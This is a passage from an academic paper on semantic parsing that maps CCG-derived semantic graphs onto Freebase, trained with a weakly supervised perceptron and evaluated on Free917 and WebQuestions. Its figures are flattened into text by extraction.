parser is moti- vated by the scale of our problem; the parser must be broad-coverage and robust enough to handle a web-sized corpus. For these reasons, we rely on the C&C parser (Clark and Curran, 2004), a general- purpose CCG parser, to obtain syntactic deriva- tions. To our knowledge, we present the first at- tempt to use a CCG parser trained on treebanks for grounded semantic parsing. Most previous work has induced task-specific CCG grammars (Zettlemoyer and Collins, 2005, 2007; Kwiatkowski et al., 2010). An example CCG derivation is shown in Figure 4. Semantic parses are constructed from syntac- tic CCG parses, with semantic composition be- ing guided by the CCG syntactic derivation.2 We use a neo-Davidsonian (Parsons, 1990) semantics to represent semantic parses.3 Each word has a semantic category based on its syntactic cate- gory and part of speech. For example, the syn- tactic category for directed is (S\NP)/NP, i.e., it 2See Bos et al. (2004) for a detailed introduction to semantic representation using CCG. 3Neo-Davidsonian semantics is a form of first-order logic that uses event identifiers (e) to connect verb predicates and their subcategorized arguments through conjunctions. Titanic e Cameron directed e e 1997 dir ec ted .ar g1 dir ect ed .ar g2 d ire c te d .in d ire c te d .a rg 2 directed.arg1 directed.in directed.arg1(e, Cameron) ∧ directed.arg2(e, Titanic) ∧ directed.in(e, 1997) (a) Ungrounded graph Titanic m Cameron directed n 1997 film .di rec ted by .ar g2 film .di rec ted by .ar g1 fi lm .in itia l re le a se d a te .a rg 2 fi lm .in itia l re le a se d a te .a rg 1 film.directed by.arg2(m, Cameron) ∧ film.directed by.arg1(m, Titanic) ∧ film.initial release date.arg1(n, Titanic) ∧ film.initial release date.arg2(n, 1997) (b) Grounded graph Figure 5: Graph representations for the sentence Cameron directed Titanic in 1997. takes two argument NPs and becomes S. To rep- resent its semantic category, we use a lambda term λyλx. directed.arg1(e,x)∧ directed.arg2(e,y), where e identifies the event of directed, and x and y are arguments corresponding to the NPs in the syn- tactic category. We obtain semantic categories automatically us- ing the indexed syntactic categories provided by the C&C parser. The latter reveal the bind- ings of basic constituent categories in more com- plex categories. For example, in order to convert ((S\NP)\(S\NP))/NP to its semantic category, we must know whether all NPs have the same refer- ent and thus use the same variable name. The in- dexed category ((Se\NPx)\(Se\NPx))/NPy reveals that there are only two different NPs, x and y, and that one of them (i.e., x) is shared across two subcat- egories. We discuss the details of semantic category construction in the Appendix. Apart from n-ary predicates representing events (mostly verbs), we also use unary predicates repre- senting types in language (mostly common nouns and noun modifiers). For example, capital(Austin) indicates Austin is of type capital. Prepositions, ad- jectives and adverbs are represented by predicates lexicalized with their head words to provide more information (see capital.of.arg1 instead of of.arg1 in Figure 2a). 2.3 Ungrounded Semantic Graphs We will now illustrate how we create ungrounded semantic graphs from CCG-derived semantic parses. Figure 5a displays the ungrounded graph for the sen- Who target directed x e The Nutty Professor directed.arg1 directed .arg2 target(x) ∧ directed.arg1(e, x) ∧ directed.arg2(e, TheNuttyProfessor) (a) Who directed The Nutty Professor? capital capital unique Austin e Texas capital .state state ty p e ty p e capital.of .arg1 capital.of .arg2 unique(Austin) ∧ capital(Austin) ∧ capital.state(Austin) ∧ capital.of.arg1(e, Austin) ∧ capital.of.arg2(e, Texas) (b) Austin is the state capital of Texas. Figure 6: Ungrounded graphs with math functions TARGET and UNIQUE. tence Cameron directed Titanic in 1997. In order to construct ungrounded graphs topologically simi- lar to Freebase, we define five types of nodes: Word Nodes (Ovals) Word nodes are denoted by ovals. They represent natural language words (e.g., directed in Figure 5a, capital and state in Fig- ure 6b). Word nodes are connected to other word nodes via syntactic dependencies. For readability, we do not show inter-word dependencies. Entity Nodes (Rectangles) Entity nodes are denoted by rectangles and represent entities e.g., Cameron in Figure 5a. In cases where an entity is not known, we use variables e.g., x in Figure 6a. Entity variables are connected to their correspond- ing word nodes from which they originate by dotted links e.g., x in Figure 6a is connected to the word node who. Mediator Nodes (Circles) Mediator nodes are de- noted by circles and represent events in language. They connect pairs of entities which participate in an event forming a clique (see the entities Cameron, Titanic and 1997 in Figure 5a). We define an edge as a link that connects any two entities via a medi- ator. The subedge of an edge i.e., the link between a mediator and an entity, corresponds to the predi- cate denoting the event and taking the entity as its argument (e.g. directed.arg1 links e and Cameron in Figure 5a). Mediator nodes are connected to their corresponding word nodes from which they origi- nate by dotted links e.g. mediators in Figure 5a are connected to word node directed. Type nodes (Rounded rectangles) Type nodes are denoted by rounded rectangles. They represent unary predicates in natural language. In Figure 6b type nodes capital and capital.state are attached to Austin denoting Austin is of type capital and capi- tal.state. Type nodes are also connected to their cor- responding word nodes from which they originate by dotted links e.g. type node capital.state and word node state in Figure 6b. Math nodes (Diamonds) Math nodes are denoted by diamonds. They describe functions to be applied on the nodes/subgraphs they attach to. The function TARGET attaches to the entity variable of interest. For example, the graph in Figure 6a represents the question Who directed The Nutty Professor?. Here, TARGET attaches to x representing the word who. UNIQUE attaches to the entity variable modified by the definite article the. In Figure 6b, UNIQUE at- taches to Austin implying that only Austin satisfies the graph. Finally, COUNT attaches to entity nodes which have to be counted. For the sentence Julie An- drews has appeared in 40 movies in Figure 7, the KB could either link Julie Andrews and 40, with type node movies matching the grounded type integer, or it could link Julie Andrews to each movie she acted in and the count of these different movies add to 40. In anticipation of this ambiguity, we generate two semantic parses resulting in two ungrounded graphs (see Figures 7a and 7b). We generate all possible grounded graphs corresponding to each ungrounded graph, and leave it up to the learning to decide which ones the KB prefers. 2.4 Grounded Semantic Graphs We ground semantic graphs in Freebase by mapping edge labels to relations, type nodes to entity types, and entity nodes to Freebase entities. Math nodes remain unchanged. Though word nodes are not present in Freebase, we retain them in our grounded graphs to extract sophisticated features based on words and grounded predicates. appeared movies movies Julie Andrews e 40 appeared .arg1 appeared.in ty p e appeared.arg1(e, JulieAndrews) ∧ appeared.in(e, 40) ∧ movies(40) (a) Ungrounded Graph appeared movies movies Julie Andrews e z count 40 appeared .arg1 appeared .in ty p e appeared.arg1(e, JulieAndrews) ∧ appeared.in(e, z) ∧ movies(z) ∧ count(z, 40) (b) Alternate Ungrounded Graph appeared film movies Julie Andrews m z count 40 performance .actor performance .film ty p e performance.actor(m, JulieAndrews) ∧ performance.film(m, z) ∧ film(z) ∧ count(z, 40) (c) Grounded graph Figure 7: Graph representations for the sentence Julie Andrews has appeared in 40 movies. Un- grounded graph (a) directly connects Julie Andrews and 40, whereas graph (b) uses the math func- tion COUNT. Ungrounded graph (b) and grounded graph (c) have similar topology. Entity nodes Previous approaches (Cai and Yates, 2013; Berant et al., 2013; Kwiatkowski et al., 2013) use a manual lexicon or heuristics to ground named entities to Freebase entities. Fortunately, CLUEWEB09 sentences have been automatically annotated with Freebase entities, so we use these an- notations to ground proper names to Freebase enti- ties (denoted by uppercase words) e.g., Cameron in Figure 5a is grounded to Freebase entity CAMERON in Figure 5b. Common nouns like movies (see Fig- ure 7b) are left as variables to be instantiated by the entities satisfying the graph. Type nodes Type nodes are grounded to Free- base entity types. Type nodes capital and capi- tal.state in Figure 6b are grounded to all possible types of Austin (e.g., location.city, location.capital city, book.book subject, broadcast.genre). In cases where entity nodes are not grounded, (e.g., z in Figure 7b), employees employees 120000 e Alcoa has e e 2007 type ha s.a rg1 ha s.a rg 2 h a s.in h a s. a rg 2 has.arg1 has.in has.arg1(e, Alcoa) ∧ has.arg2(e, 120000) ∧ has.in(e, 2007) ∧ employees(120000) (a) Ungrounded Graph employees type.int 119000 m Alcoa has m m 2007 type em plo ye r.n um be r of em plo ye es .in ve rse m ea su re m en t un it .d at ed in te ge r .n um be r m e a su re m e n t u n it .d a te d in te g e r .y e a r m e a su re m e n t u n it .d a te d in te g e r .n u m b e r employer.number of employees .inverse m easurem ent unit .dated integer .year employer.number of employees.inverse(m, Alcoa) ∧ measurement unit.dated integer.number(m, 119000) ∧ measurement unit.dated integer.year(m, 2007) ∧ type.int(119000) (b) Grounded Graph Figure 8: Graph representations for Alcoa has 120000 employees in 2007. we use an automatically constructed lexicon which maps ungrounded types to grounded ones (see Sec- tion 4.2 for details). Edges An edge between two entities is grounded using all edges linking the two entities in the knowl- edge graph. For example, to ground the edge be- tween Titanic and Cameron in Figure 5, we use the following edges linking TITANIC and CAMERON in Freebase: (film.directed by.arg1, film.directed by.arg2), (film.produced by.arg1, film.produced by.arg2). If only one entity is grounded, we use all possible edges from this grounded entity. If no entity is grounded, we use a mapping lexicon which is automatically created as described in Section 4.2. Given an un- grounded graph with n edges, there are O((k + 1)n) possible grounded graphs, with k being the grounded edges in the knowledge graph for each ungrounded edge together with an additional empty (no) edge. Mediator nodes In an ungrounded graph, media- tor nodes represent semantic event identifiers. In the grounded graph, they represent Freebase fact identi- fiers. Fact identifiers help distinguish if neighboring edges belong to a single complex fact, which may or may not be coextensive with an ungrounded event. In Figure 8a, the edges corresponding to the event identifier e are grounded to a single complex fact in Figure 8b, with the fact identifier m. However, in Figure 5a, the edges of the ungrounded event e are grounded to different Freebase facts, distinguished in Figure 5b by the identifiers m and n. Furthermore, the edge in 5a between CAMERON and 1997 is not grounded in 5b, since no Freebase edge exists be- tween the two entities. We convert grounded graphs to SPARQL queries, but for readability we only show logical expressions. The conversion is deterministic and is exactly the inverse of the semantic parse to graph conversion (Section 2.3). Wherever a node/edge is instantiated with a grounded entity/type/relation in Freebase, we use them in the grounded parse (e.g., type node cap- ital.state in Figure 6b becomes location.capital city). Math function TARGET is useful in retrieving instan- tiations of entity variables of interest (see Figure 6a). 3 Learning A natural language sentence may give rise to several grounded graphs. But only one (or a few) of them will be a faithful representation of the sentence in Freebase. We next describe our algorithm for find- ing the best Freebase graph for a given sentence, our learning model, and the features it uses. 3.1 Algorithm Freebase has a large number of relations and enti- ties, and as a result there are many possible grounded graphs g for each ungrounded graph u. We con- struct and score graphs incrementally, traversing each node in the ungrounded graph and matching its edges and types in Freebase. Given a NL sentence s, we construct from its CCG syntactic derivation all corresponding ungrounded graphs u. Using a beam search procedure (described in Section 4.2), we find the best scoring graphs (ĝ,û), maximizing over dif- ferent graph configurations (g,u) of s: (ĝ,û) = arg max g,u Φ(g,u,s,K B)·θ (1) We define the score of (ĝ,û) as the dot product between a high dimensional feature representation Φ = (Φ1,...Φm) and a weight vector θ (see Sec- tion 3.3 for details on the features we employ). We estimate the weights θ using the averaged structured perceptron algorithm (Collins, 2002). As shown in Algorithm 1, the perceptron makes sev- eral passes over sentences, and in each iteration it computes the best scoring (ĝ,û) among the candi- date graphs for a given sentence. In line 6, the al- gorithm updates θ with the difference (if any) be- Algorithm 1: Averaged Structured Perceptron Input: Training sentences: {si}Ni=1 1 θ ← 0 2 for t ← 1...T do 3 for i ← 1...N do 4 (ĝi,ûi) = arg max gi,ui Φ(gi,ui,si,K B)·θ 5 if (u+i ,g + i ) 6= (ûi,ĝi) then 6 θ ← θ + Φ(g+i ,u + i ,si,K B)−Φ(ĝi,ûi,si,K B) 7 return 1T ∑ T t=i 1 N ∑ N i=1 θ i t tween the feature representations of the best scoring graph (ĝ,û) and the gold standard graph (g+,u+). The goal of the algorithm is to rank gold standard graphs higher than the any other graphs. The final weight vector θ is the average of weight vectors over T iterations and N sentences. This averaging pro- cedure avoids overfitting and produces more stable results (Collins, 2002). As we do not make use of question-answer pairs or manual annotations of sentences, gold standard graphs (g+,u+) are not available. In the following, we explain how we approximate them by relying on graph denotations as a form of weak supervision. 3.2 Selecting Surrogate Gold Graphs Let u be an ungrounded semantic graph of s. We se- lect an entity E in u, replace it with a variable x, and make it a target node. Let u+ represent the resulting ungrounded graph. Next, we obtain all grounded graphs g+ which correspond to u+ such that the denotations [[u+]]K B = [[g +]]N L . We use these surrogate graphs g+as gold standard, and the pairs (u+,g+) for model training. There is con- siderable latitude in choosing which entity E to re- place. This can be done randomly, according to en- tity frequency, or some other criterion. We found that substituting the entity with the most connections to other entities in the sentence works well in prac- tice. All the entities that can replace x in u+ to con- stitute a valid fact in Freebase will be the denotation of u+, [[u+]]N L . While it is straightforward to com- pute [[g+]]K B , it is hard to compute [[u +]]N L because of the mismatch between our natural language se- mantic language and the Freebase query language. To ensure that graphs u+ and g+ have the same de- notations, we impose the following constraints: Constraint 1 If the math function UNIQUE is attached to the entity being replaced in the un- grounded graph, we assume the denotation of u+ contains only that entity. For example, in Fig- ure 2b, we replace Austin by x, and thus assume [[u+]]N L = {AUSTIN}.4 Any grounded graph which results in [[g+]]K B = {AUSTIN} will be considered a surrogate gold graph. This allows us to learn entail- ment relations, e.g., capital.of should be grounded to location.capital (left hand-side graph in Figure 2d) and not to location.containedby which results in all loca- tions in Texas (right hand-side graph in Figure 2d). Constraint 2 If the target entity node is a num- ber, we select the Freebase graphs with denota- tion close to this number. For example, in Fig- ure 8a if 120,000 is replaced by x, and we as- sume [[u+]]N L = {120,000}. However, the grounded graph 8b retrieves [[g+]]K B = {119,000}. We treat this as correct if β γ ∈ [0.9,1.1] where β ∈ [[u+]]N L and γ ∈ [[g+]]K B . Integers can either occur directly in relation with an entity as in Figure 8b, or must be enumerated as in Figure 7c. Constraint 3 If the target entity node is a date, we select the grounded graph which results in the small- est set containing the date based on the intuition that most sentences in the data describe specific rather than general events. Constraint 4 If none of the above constraints ap- ply to the target entity E, we know E ∈ [[u+]]N L , and hence we select the grounded graphs which satisfy E ∈ [[g+]]K B as surrogate gold graphs. 3.3 Features Our feature vector Φ(g,u,s,K B) denotes the fea- tures extracted from a sentence s and its correspond- ing graphs u and g with respect to a knowledge base K B . The elements of the vector (φ1, φ2, . . . ) take integer values denoting the number of times a feature appeared. We devised the following broad feature classes: Lexical alignments Since ungrounded graphs are similar in topology to grounded graphs, we extract ungrounded and grounded edge 4We also remove UNIQUE attached to x to exactly mimic the test time setting. and type alignments. So, from graphs 5a and 5b, we obtain the edge alignment φedge(directed.arg1, directed.arg2, film.directed by.arg2, film.directed by.arg1) and the subedge align- ments φedge(directed.arg1, film.directed by.arg2) and φedge(directed.arg2, film.directed by.arg1). In a similar fashion we extract type alignments (e.g., φtype(capital,location.city)). Contextual features In addition to lexical alignments, we also use contextual features which essentially record words or word com- binations surrounding grounded edge labels. Feature φevent records an event word and its grounded predicates (e.g., in Figure 7c we extract features φevent(appear, performance.film) and φevent(appear, performance.actor). Fea- ture φarg records a predicate and its argument words (e.g., φarg(performance.film,movie) in Figure 7c). Word combination features are ex- tracted from the parser’s dependency output. The feature φdep records a predicate and the dependencies of its event word (e.g., from the grounded version of Figure 6b we extract features φdep(location.state.capital.arg1,capital,state) and φdep(location.state.capital.arg2,capital,state)). Using such features, we are able to handle multiword predicates. Lexical similarity We count the number of word stems5 shared by grounded and ungrounded edge labels e.g., in Figure 5 directed.arg1 and film.directed by.arg2 have one stem overlap (ignoring the argument labels arg1 and arg2). For a grounded graph, we compute φstem, the aggregate stem overlap count over all its grounded and ungrounded edge la- bels. We did not incorporate WordNet/Wiktionary- based lexical similarity features but these were found fruitful in Kwiatkowski et al. (2013). We also have a feature for stem overlap count between the grounded edge labels and the context words. Graph connectivity features These features pe- nalize graphs with non-standard topologies. For ex- ample, we do not want a final graph with no edges. The feature value φhasEdge is one if there exists at least one edge in the graph. We also have a fea- ture φnodeCount for counting the number of connected 5We use the Porter stemmer. Domain #Rels #Types #Triples #Train #Free917 #WebQ business 226 102 23m 30k 46 49 film 113 75 42m 13k 49 91 people 85 59 68m 56k 29 430 all* 411 210 120m 99k 124 570 Table 1: Domain-specific Freebase statistics (*some relations/types/triples are shared across domains); number of training CLUEWEB09 sentences; number of test questions in FREE917 and WEBQUESTIONS. nodes in the graph. Finally, feature φcolloc captures the collocation of grounded edges (e.g., edges be- longing to a single complex fact are likely to co- occur; see Figure 8b). 4 Experimental Setup In this section we present our experimental set-up for assessing the performance of the semantic parser described above. We present the datasets on which our model was trained and tested, discuss implemen- tation details, and briefly introduce the models used for comparison with our approach. 4.1 Data We evaluated our approach on the FREE917 (Cai and Yates, 2013) and WEBQUESTIONS (Berant et al., 2013) datasets. FREE917 consists of 917 questions and their meaning representations (written in a variant of lambda calculus) which we, however, do not use. The dataset represents 81 domains covering 635 Freebase relations, with most domains containing fewer than 10 questions. We report results on three domains, namely film, business, and people as these are relatively large in both FREE917 and Freebase. WEBQUESTIONS consists of 5,810 question-answer pairs, 2,780 of which are reserved for testing. Our experiments used a subset of WEBQUESTIONS representing the three target domains. We extracted domain-specific queries semi-automatically by identifying question- answer pairs with entities in target domain relations. In both datasets, named entities were disambiguated to Freebase entities with a named entity lexicon.6 Table 1 presents descriptive statistics for each do- main. Evaluating on all domains in Freebase would 6FREE917 comes with a named entity lexicon. For WEBQUES- TIONS we hand-coded this lexicon. generate a very large number of queries for which denotations would have to be computed (the number of queries is linear in the number of domains and the size of training data). Our system loads Freebase us- ing Virtuoso7 and queries it with SPARQL. Virtuoso is slow in dealing with millions of queries indexed on the entire Freebase, and is the only reason we did not work with the complete Freebase. 4.2 Implementation To train our model, we extracted sentences from CLUEWEB09 which contain at least two entities as- sociated with a relation in Freebase, and have an edge between them in the ungrounded graph. These were further filtered so as to remove sentences which do not yield at least one semantic parse without an uninstantiated entity variable. For example, the sen- tence Avatar is directed by Cameron would be used for training, whereas Avatar directed by Cameron re- ceived a critical review wouldn’t. In the latter case, any semantic parse will have an uninstantiated en- tity variable for review. Table 1 (Train) shows the number of sentences we obtained. In order to train our semantic parser, we ini- tialized the alignment and type features (φedge and φtype, respectively) with the alignment lexicon weights. These weights are computed as follows. Let count(r′,r) denote the number of pairs of enti- ties which are linked with edge r′ in Freebase and edge r in CLUEWEB09 sentences. We then estimate the probability distribution P(r′/r) = count(r ′,r) ∑i count(r ′ i,r) . Analogously, we created a type alignment lexicon. The counts were collected from CLUEWEB09 sen- tences containing pairs of entities linked with an edge in Freebase (business 390k, film 130k, and people 490k). Contextual features were initialized to −1 since most word contexts and grounded predi- cates/types do not appear together. All other features were set to 0. We used a beam-search algorithm to convert un- grounded graphs to grounded ones. The edges and types of each ungrounded graph are placed in a pri- ority queue. Priority is based on edge/type tf-idf scores collected over CLUEWEB09. At each step, we pop an element from the queue and ground it in Freebase. We rank the resulting grounded graphs us- 7http://virtuoso.openlinksw.com ing the perceptron model, and pick the n-best ones, where n is the beam size. We continue until the queue is empty. In our experiments we used a beam size of 100. We trained a single model for all the do- mains combined together. We ran the perceptron for 20 iterations (around 5–10 million queries). At each training iteration we used 6,000 randomly selected sentences from the training corpus. 4.3 Comparison Systems We compared our graph-based semantic parser (henceforth GRAPHPARSER) against two state-of- the-art systems both of which are open-domain and work with Freebase. The semantic parser developed by Kwiatkowski et al. (2013) (henceforth KCAZ13) is learned from question-answer pairs and follows a two-stage procedure: first, a natural language sen- tence is converted to a domain-independent seman- tic parse and then grounded onto Freebase using a set of logical-type equivalent operators. The opera- tors explore possible ways sentential meaning could be expressed in Freebase and essentially transform logical form to match the target ontology. Our ap- proach also has two steps (i.e., we first generate mul- tiple ungrounded graphs and then ground them to different Freebase graphs). We do not use opera- tors to perform structure matching, rather we cre- ate multiple graphs and leave it up to the learner to find an appropriate grounding using a rich feature space. To give a specific example, their operator lit- eral to constant is equivalent to having named enti- ties for larger text chunks in our case. Their operator split literal explores different edge possibilities in an event whereas we start with a clique and remove un- wanted edges. Our approach has (almost) similar expressive power but is conceptually simpler. Our second comparison system was the seman- tic parser of Berant and Liang (2014) (henceforth PARASEMPRE) which also uses QA pairs for train- ing and makes use of paraphrasing. Given an in- put NL sentence, they first construct a set of logi- cal forms based on hand-coded rules, and then gen- erate sentences from each logical form (using gen- eration templates and a lexicon). Pairs of logical forms and natural language are finally scored us- ing a paraphrase model consisting of two compo- nents. An association model determines whether they contain phrase pairs likely to be paraphrases System Prec Rec F1 MWG 52.6 49.1 50.8 KCAZ13 72.6 66.1 69.2 GRAPHPARSER 81.9 76.6 79.2 Table 2: Experimental results on FREE917. and a vector space model assigns a vector represen- tation for each sentence, and learns a scoring func- tion that ranks paraphrase candidates. Our seman- tic parser employs a graph-based representation as a means of handling the mismatch between natu- ral language, whereas PARASEMPRE opts for a text- based one through paraphrasing. Finally, we compared our semantic parser against a baseline which is based on graphs but em- ploys no learning. The baseline converts an un- grounded graph to a grounded one by replacing each ungrounded edge/type with the highest weighted grounded label creating a maximum weighted graph, henceforth MWG. Both GRAPHPARSER and the baseline use the same alignment lexicon (a weighted mapping from ungrounded to grounded labels). 5 Results Table 2 summarizes our results on FREE917. As described earlier, we evaluated GRAPHPARSER on a subset of the dataset representing three domains (business, film, and people). Since this sub- set contains a relatively small number of instances (124 in total), we performed 10-fold cross valida- tion with 9 folds as development data8, and one fold as test data. We report results averaged over all test folds. With respect to KCAZ13, we present re- sults with their cross-domain trained models, where training data from multiple domains is used to test foreign domains.9 KCAZ13 used generic features like string similarity and knowledge base features which apply across domains and do not require in- domain training data. We do not report results with PARASEMPRE as the small number of training in- stances would put their method at a disadvantage. We treat a predicted query as correct if its denota- 8The development data is only used for model selection and for determining the optimal training iteration. 9We are grateful to Tom Kwiatkowski for supplying us with the output of their system. Features FREE917 WEBQ All 79.2 41.4 −Contextual 73.3 42.6 −Alignment 66.7 34.8 −Connectivity 65.0 36.6 −Similarity 62.5 35.0 Table 3: GRAPHPARSER ablation results on FREE917 and WEBQUESTIONS development set. tion is exactly equal to the denotation of the manu- ally annotated gold query. As can be seen, GRAPHPARSER outperforms KCAZ13 and the MWG baseline by a wide margin. This is an encouraging result bearing in mind that our model does not use question-answer pairs. We should also point out that our domain relation set is larger compared to KCAZ13. We do not prune any of the relations in Freebase, whereas KCAZ13 use only 112 relations and 83 types from our three domains (see Table 1). We further performed a feature ab- lation study to examine the contribution of different feature classes. As shown in Table 3, the most im- portant features are those based on lexical similar- ity, as also observed in KCAZ13. Graph connectivity and lexical alignments are equally important (these features are absent from KCAZ13). Contextual fea- tures are not very helpful over and above alignment features which also encode contextual information. Overall, generic features like lexical similarity are helpful only to a certain extent; the performance of GRAPHPARSER improves considerably when addi- tional graph-related features are taken into account. We also analyzed the errors GRAPHPARSER makes. 25% of these are caused by the C&C parser and are cases where it either returns no syntactic analysis or a wrong one. 19% of the errors are due to Freebase inconsistencies. For example, our system answered the question How many stores are in Nittany mall? with 65 using the relation shop- ping center.number of stores whereas the gold stan- dard provides the answer 25 counting all stores using the relation shopping center.store. Around 15% of er- rors include structural mismatches between natural language and Freebase; for the question Who is the president of Gap Inc?, our method grounds president to a grounded type whereas in Freebase it is repre- sented as a relation employment.job.title. The remain- System Prec Rec F1 MWG 39.4 34.0 36.5 PARASEMPRE 37.5 37.5 37.5 GRAPHPARSER 41.9 37.0 39.3 GRAPHPARSER + PARA 44.7 38.4 41.3 Table 4: Experimental results on WEBQUESTIONS. ing errors are miscellaneous. For example, the ques- tion What are some films on Antarctica? receives two interpretations, i.e., movies filmed in Antarctica or movies with Antarctica as their subject. We next discuss our results on WEBQUESTIONS. PARASEMPRE was trained with 1,115 QA pairs (corresponding to our target domains) together with question paraphrases obtained from the PARALEX corpus (Fader et al., 2013).10 While training PARASEMPRE, out-of-domain Freebase relations and types were removed. Both GRAPHPARSER and PARASEMPRE were tested on the same set of 570 in-domain QA pairs with exact answer match as the evaluation criterion. For development purposes, GRAPHPARSER uses 200 QA pairs. Table 4 displays our results. We observe that GRAPHPARSER obtains a higher F1 against MWG and PARASEMPRE. Dif- ferences in performance among these systems are less pronounced compared to FREE917. This is for a good reason. WEBQUESTIONS is a challenging dataset, created by non-experts. The questions are not tailored to Freebase in any way, they are more varied and display a wider vocabulary. As a result the mismatch between natural language and Free- base is greater and the semantic parsing task harder. Error analysis further revealed that parsing errors are responsible for 13% of the questions GRAPH- PARSER fails to answer. Another cause of er- rors is mismatches between natural language and Freebase. Around 7% of the questions are of the type Where did X come from?, and our model an- swers with the individual’s nationality, whereas an- notators provide the birthplace (city/town/village) as the right answer. Moreover, 8% of the ques- tions are of the type What does X do?, which the annotators answer with the individual’s profession. In natural language, we rarely attest constructions 10We used the SEMPRE package (http://www-nlp. stanford.edu/software/sempre/) which does not use any hand-coded entity disambiguation lexicon. like X does dentist/researcher/actor. The proposed framework assumes that Freebase and natural lan- guage are somewhat isomorphic, which is not al- ways true. An obvious future direction would be to paraphrase the questions so as to increase the num- ber of grounded and ungrounded graphs. As an illus- tration, we rewrote questions like Where did X come from to What is X’s birth place, and What did X do to What is X’s profession and evaluated our model GRAPHPARSER + PARA. As shown in Table 4, even simple paraphrasing can boost performance. Finally, Table 3 (third column) examines the con- tribution of different features on the WEBQUES- TIONS development dataset. Interestingly, we ob- serve that contextual features are not useful and in fact slightly harm performance. We hypothesize that this is due to the higher degree of mismatch between natural language and Freebase in this dataset. Fea- tures based on similarity, graph connectivity, and lexical alignments are more robust and generally useful across datasets. 6 Discussion In this paper, we introduce a new semantic pars- ing approach for Freebase. A key idea in our work is to exploit the structural and conceptual similari- ties between natural language and Freebase through a common graph-based representation. We formal- ize semantic parsing as a graph matching problem and learn a semantic parser without using annotated question-answer pairs. We have shown how to ob- tain graph representations from the output of a CCG parser and subsequently learn their correspondence to Freebase using a rich feature set and their deno- tations as a form of weak supervision. Our parser yields state-of-the art performance on three large Freebase domains and is not limited to question an- swering. We can create semantic parses for any type of NL sentences. Our work brings together several strands of re- search. Graph-based representations of sentential meaning have recently gained some attention in the literature (Banarescu et al., 2013), and attempts to map sentences to semantic graphs have met with good inter-annotator agreement. Our work is also closely related to Kwiatkowski et al. (2013) and Be- rant and Liang (2014) who present open-domain se- mantic parsers based on Freebase and trained on QA pairs. Despite differences in formulation and model structure, both approaches have explicit mechanisms for handling the mismatch between natural language and the KB (e.g., using logical-type equivalent oper- ators or paraphrases). The mismatch is handled im- plicitly in our case via our graphical representation which allows for the incorporation of all manner of powerful features. More generally, our method is based on the assumption that linguistic structure has a correspondence to Freebase structure which does not always hold (e.g., in Who is the grandmother of Prince William?, grandmother is not directly ex- pressed as a relation in Freebase). Additionally, our model fails when questions are too short with- out any lexical clues (e.g., What did Charles Darwin do? ). Supervision from annotated data or paraphras- ing could improve performance in such cases. In the future, we plan to explore cluster-based semantics (Lewis and Steedman, 2013) to increase the robust- ness on unseen NL predicates. Our work joins others in exploiting the connec- tions between natural language and open-domain knowledge bases. Recent approaches in relation ex- traction use distant supervision from a knowledge base to predict grounded relations between two tar- get entities (Mintz et al., 2009; Hoffmann et al., 2011; Riedel et al., 2013). During learning, they ag- gregate sentences containing the target entities, ig- noring richer contextual information. In contrast, we learn from each individual sentence taking into account all entities present, their relations, and how they interact. Krishnamurthy and Mitchell (2012) formalize semantic parsing as a distantly supervised relation extraction problem combined with a manu- ally specified grammar to guide semantic parse com- position. Finally, our approach learns a model of seman- tics guided by denotations as a form of weak su- pervision. Beyond semantic parsing (Artzi and Zettlemoyer, 2013; Liang et al., 2011; Clarke et al., 2010), feedback-based learning has been previously used for interpreting and following NL instructions (Branavan et al., 2009; Chen and Mooney, 2011), playing computer games (Branavan et al., 2012), and grounding language in the physical world (Krishna- murthy and Kollar, 2013; Matuszek et al., 2012). Lemma POS Semantic Class Semantic Category * VB*, IN, TO, POS EVENT directed : (Se\NPx<1>)/NPy<2> : λQλPλe.∃x∃y. directed.arg1(e,x)∧directed.arg2(e,y)∧P(x)∧Q(y) * NN, NNS TYPE movie : NP : λx.movie(x) * NNP*, PRP* ENTITY Obama : NP : λx.equal(x,Obama) * RB* EVENTMOD annually : Se\Se : λPλe.lexe.annually(e)∧P(e) * JJ* TYPEMOD state : NPx/NPx : λPλx.lexx.state(x)∧P(x) be * COPULA be: (Sy\NPx)/NPy : λQλPλy.∃x.lexy(x)∧P(x)∧Q(y) the * UNIQUE the : NPx/NPx : λPλx.UNIQUE(x)∧P(x) * CD COUNT twenty : Nx/Nx : λPλx.COUNT(x,20)∧P(x) twenty : Nx/Nx : λPλx.equal(x,20)∧P(x) not, n’t * NEGATION not : (Se\NPx)/(Se\NPx) : λPλQλe.∃x.NEGATION(e)∧P(x,e)∧Q(x) no * COMPLEMENT no : NPx/Nx : λPλx.COMPLEMENT(x)∧P(x) * WDT, WP*, QUESTION what : S[wq]e/(S[dcl]e\NPx) WRB : λPλe.∃x.TARGET(x)∧P(x,e) * WDT, WP*, CLOSED which : (NPx\NPx)/(S[dcl]e\NPx) WRB : λPλQλx.∃e.P(x,e)∧Q(x) Table 5: Rules used to classify words into semantic classes. * represents a wild card expression which matches anything. lexx denotes the lexicalised form of x e.g., when state : NPx/NPx : λPλx.lexx.state(x)∧ P(x) is applied to capital : NP : λy.capital(y), the lexicalised form of x becomes capital, and there- fore the predicate lexx.state becomes capital.state. The resulting semantic parse after application is λx.capital.state(x)∧capital(x). Appendix We use a handful of rules to divide words into semantic classes. Based on a word’s seman- tic class and indexed syntactic category, we con- struct its semantic category automatically. For example, directed is a member of the EVENT class, and its indexed syntactic category is ((Se\NPx<1>)/NPy<2>) (here, <1> and <2> in- dicate that x and y are the first and second ar- guments of e). We then generate its seman- tic category as λQλPλe.∃x∃y.directed.arg1(e,x)∧ directed.arg2(e,y)∧ P(x)∧ Q(y). Please refer to Appendix B of Clark and Curran (2007) for a list of their indexed syntactic categories. The rules are described in Table 5. Syntactic cate- gories are not shown for the sake of brevity. Most rules will match any syntactic category. Excep- tions are copula-related rules (see be in the sixth row) which apply only to the syntactic category (S\NP)/NP, and rules pertaining to wh -words (see the last two rows in the table). When more than one rule apply, we end up with multiple semantic parses. There are a few cases like passives, question words, and prepositional phrases where we modified the original indexed categories for better interpretation of the semantics (these are not displayed here). We also handle non-standard CCG operators involving unary and binary rules as described in Appendix A of Clark and Curran (2007). Acknowledgements We are grateful to the anonymous reviewers for their valuable feedback on an earlier version of this paper. Thanks to Mike Lewis and the members of ILCC for helpful discussions and comments. We acknowl- edge the support of EU ERC Advanced Fellowship 249520 GRAMPLUS and EU IST Cognitive Sys- tems IP EC-FP7-270273 “Xperience”. References Artzi, Yoav and Luke Zettlemoyer. 2011. Boot- strapping semantic parsers from conversations. In Proceedings of the 2011 Conference on Empirical Methods in Natural Language Processing. Edin- burgh, Scotland, pages 421–432. Artzi, Yoav and Luke Zettlemoyer. 